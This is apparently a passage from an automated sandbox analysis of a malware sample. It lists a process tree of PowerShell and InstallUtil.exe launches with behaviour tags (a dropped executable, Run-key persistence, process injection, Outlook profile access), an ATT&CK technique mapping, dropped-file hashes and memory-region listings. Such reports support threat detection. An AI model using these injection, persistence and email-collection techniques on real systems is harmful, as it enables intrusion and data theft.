"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAxAA==
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:556

C:\Users\Admin\AppData\Local\Temp\Crstwuze5m.exe
"C:\Users\Admin\AppData\Local\Temp\Crstwuze5m.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1268

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:732

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAxAA==
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1240

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:1388

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Email Collection

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Crstwuze5m.exe
Filesize
172KB

MD5
982f97ccf89f9d50dbc5d152c7139a50

SHA1
0ba6c448dd8566a1196e642ef1d834d55bf6e3e6

SHA256
f41360c7779e6656ec89fdfa40ae58b619d80dd27286802a9e902ab9dde19152

SHA512
c51127261b13e135e183c779c2bc10b5f43a2e27ccfd902829abc215beddd2070cf3739ac810201ae4eaf98dc9afab9b5e6923e97b1ca7bd0c7e661706c08fd1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Crstwuze5m.exe
Filesize
172KB

MD5
982f97ccf89f9d50dbc5d152c7139a50

SHA1
0ba6c448dd8566a1196e642ef1d834d55bf6e3e6

SHA256
f41360c7779e6656ec89fdfa40ae58b619d80dd27286802a9e902ab9dde19152

SHA512
c51127261b13e135e183c779c2bc10b5f43a2e27ccfd902829abc215beddd2070cf3739ac810201ae4eaf98dc9afab9b5e6923e97b1ca7bd0c7e661706c08fd1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
0d62b070cf821f03fd5e8315d9fb6adb

SHA1
6c166f9d7e1bfd15a0caea72ee49fd866a39b575

SHA256
f3df0290ddbd9de7c9c98d0a42b242e3ba094a97a1ecbfd56790af910e956b91

SHA512
fa2d9ea89231e98554993ad663f1b2baa59d60d6109bb7466507ec7d037e423dd3e3191847f8aa54817ac5d0af3bea27d2043ffdfdd57a230802ed5c4a8613ac

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
0d62b070cf821f03fd5e8315d9fb6adb

SHA1
6c166f9d7e1bfd15a0caea72ee49fd866a39b575

SHA256
f3df0290ddbd9de7c9c98d0a42b242e3ba094a97a1ecbfd56790af910e956b91

SHA512
fa2d9ea89231e98554993ad663f1b2baa59d60d6109bb7466507ec7d037e423dd3e3191847f8aa54817ac5d0af3bea27d2043ffdfdd57a230802ed5c4a8613ac

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
0d62b070cf821f03fd5e8315d9fb6adb

SHA1
6c166f9d7e1bfd15a0caea72ee49fd866a39b575

SHA256
f3df0290ddbd9de7c9c98d0a42b242e3ba094a97a1ecbfd56790af910e956b91

SHA512
fa2d9ea89231e98554993ad663f1b2baa59d60d6109bb7466507ec7d037e423dd3e3191847f8aa54817ac5d0af3bea27d2043ffdfdd57a230802ed5c4a8613ac

Download Submit
C:\Users\Admin\AppData\Roaming\Tupbtqbro\Aeigqqh.exe
Filesize
172KB

MD5
64f238f4ae856e63b6f9d2f02d264f86

SHA1
99edc3db13ce32bb8945f46256d6ab01b1f4f096

SHA256
b135e38adf32f2419c2d4d892e3f9c45e3d9df0af170ced010f0757fb1840e32

SHA512
51c328ba30aeb94784b5f8689daa7c61b70c88ee2b611232e5f38abc201f7fe6f5146158da4348ac1f3e5050c9d9b56c87e0846f81875f4be9382aa849adf279

Download Submit
C:\Users\Admin\Documents\Agynyddjasev.exe.exe
Filesize
172KB

MD5
18d5927d197f41af4d9b16621b0515a6

SHA1
d2f4345de440d781b22f3ecf5b922783b4264bdd

SHA256
613113ce85195ad4ee1d48d212424be5719d697429f2cfe422752e056d2236c0

SHA512
60dde5e043e91469135829aa1590d7e505644fa22a675a205e5cc40e507b27b06e6fcfcc418b72fc8752a788ce51fd8ee3919fa4534ae94bf889db948b50e24b

Download Submit
C:\Users\Admin\Documents\Agynyddjasev.exe.exe
Filesize
172KB

MD5
18d5927d197f41af4d9b16621b0515a6

SHA1
d2f4345de440d781b22f3ecf5b922783b4264bdd

SHA256
613113ce85195ad4ee1d48d212424be5719d697429f2cfe422752e056d2236c0

SHA512
60dde5e043e91469135829aa1590d7e505644fa22a675a205e5cc40e507b27b06e6fcfcc418b72fc8752a788ce51fd8ee3919fa4534ae94bf889db948b50e24b

Download Submit
\Users\Admin\AppData\Local\Temp\Crstwuze5m.exe
Filesize
172KB

MD5
982f97ccf89f9d50dbc5d152c7139a50

SHA1
0ba6c448dd8566a1196e642ef1d834d55bf6e3e6

SHA256
f41360c7779e6656ec89fdfa40ae58b619d80dd27286802a9e902ab9dde19152

SHA512
c51127261b13e135e183c779c2bc10b5f43a2e27ccfd902829abc215beddd2070cf3739ac810201ae4eaf98dc9afab9b5e6923e97b1ca7bd0c7e661706c08fd1

Download Submit
\Users\Admin\Documents\Agynyddjasev.exe.exe
Filesize
172KB

MD5
18d5927d197f41af4d9b16621b0515a6

SHA1
d2f4345de440d781b22f3ecf5b922783b4264bdd

SHA256
613113ce85195ad4ee1d48d212424be5719d697429f2cfe422752e056d2236c0

SHA512
60dde5e043e91469135829aa1590d7e505644fa22a675a205e5cc40e507b27b06e6fcfcc418b72fc8752a788ce51fd8ee3919fa4534ae94bf889db948b50e24b

Download Submit
memory/556-79-0x0000000000000000-mapping.dmp

Download
memory/556-84-0x0000000067950000-0x0000000067EFB000-memory.dmp

Filesize
5.7MB

Download
memory/556-83-0x0000000004CC0000-0x0000000004F92000-memory.dmp

Filesize
2.8MB

Download
memory/556-85-0x0000000067950000-0x0000000067EFB000-memory.dmp

Filesize
5.7MB

Download
memory/732-110-0x0000000067950000-0x0000000067EFB000-memory.dmp

Filesize
5.7MB

Download
memory/732-97-0x0000000067950000-0x0000000067EFB000-memory.dmp

Filesize
5.7MB

Download
memory/732-96-0x0000000004D30000-0x0000000005002000-memory.dmp

Filesize
2.8MB

Download
memory/732-92-0x0000000000000000-mapping.dmp

Download
memory/844-61-0x0000000000000000-mapping.dmp

Download
memory/1240-120-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1240-121-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1240-124-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1240-123-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1240-125-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1240-126-0x000000000040C75E-mapping.dmp

Download
memory/1240-130-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1240-128-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1268-111-0x0000000005800000-0x00000000058C4000-memory.dmp

Filesize
784KB

Download
memory/1268-87-0x0000000000000000-mapping.dmp

Download
memory/1268-90-0x00000000009D0000-0x0000000000A00000-memory.dmp

Filesize
192KB

Download
memory/1388-104-0x0000000000435D8E-mapping.dmp

Download
memory/1388-108-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/1388-106-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/1388-98-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/1388-99-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/1388-101-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/1388-102-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/1388-103-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/1528-70-0x0000000000000000-mapping.dmp

Download
memory/1528-76-0x0000000067950000-0x0000000067EFB000-memory.dmp

Filesize
5.7MB

Download
memory/1528-73-0x0000000067950000-0x0000000067EFB000-memory.dmp

Filesize
5.7MB

Download
memory/1528-74-0x0000000004D10000-0x0000000004FE2000-memory.dmp

Filesize
2.8MB

Download
memory/1928-117-0x0000000004C30000-0x0000000004F02000-memory.dmp

Filesize
2.8MB

Download
memory/1928-118-0x0000000067950000-0x0000000067EFB000-memory.dmp

Filesize
5.7MB

Download
memory/1928-112-0x0000000000000000-mapping.dmp

Download
memory/1928-116-0x0000000067950000-0x0000000067EFB000-memory.dmp

Filesize
5.7MB

Download
memory/1964-57-0x00000000727FD000-0x0000000072808000-memory.dmp

Filesize
44KB

Download
memory/1964-54-0x000000002FDB1000-0x000000002FDB4000-memory.dmp

Filesize
12KB

Download
memory/1964-75-0x00000000727FD000-0x0000000072808000-memory.dmp

Filesize
44KB

Download
memory/1964-58-0x0000000075401000-0x0000000075403000-memory.dmp

Filesize
8KB

Download
memory/1964-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1964-55-0x0000000071811000-0x0000000071813000-memory.dmp

Filesize
8KB

Download
memory/1964-132-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1964-133-0x00000000727FD000-0x0000000072808000-memory.dmp

Filesize
44KB

Download
memory/1972-78-0x0000000004D70000-0x0000000004DBC000-memory.dmp

Filesize
304KB

Download
memory/1972-68-0x0000000000F00000-0x0000000000F30000-memory.dmp

Filesize
192KB

Download
memory/1972-66-0x0000000000000000-mapping.dmp

Download
memory/1972-77-0x0000000005D80000-0x0000000005E58000-memory.dmp

Filesize
864KB

Download
memory/2004-62-0x0000000000000000-mapping.dmp

Download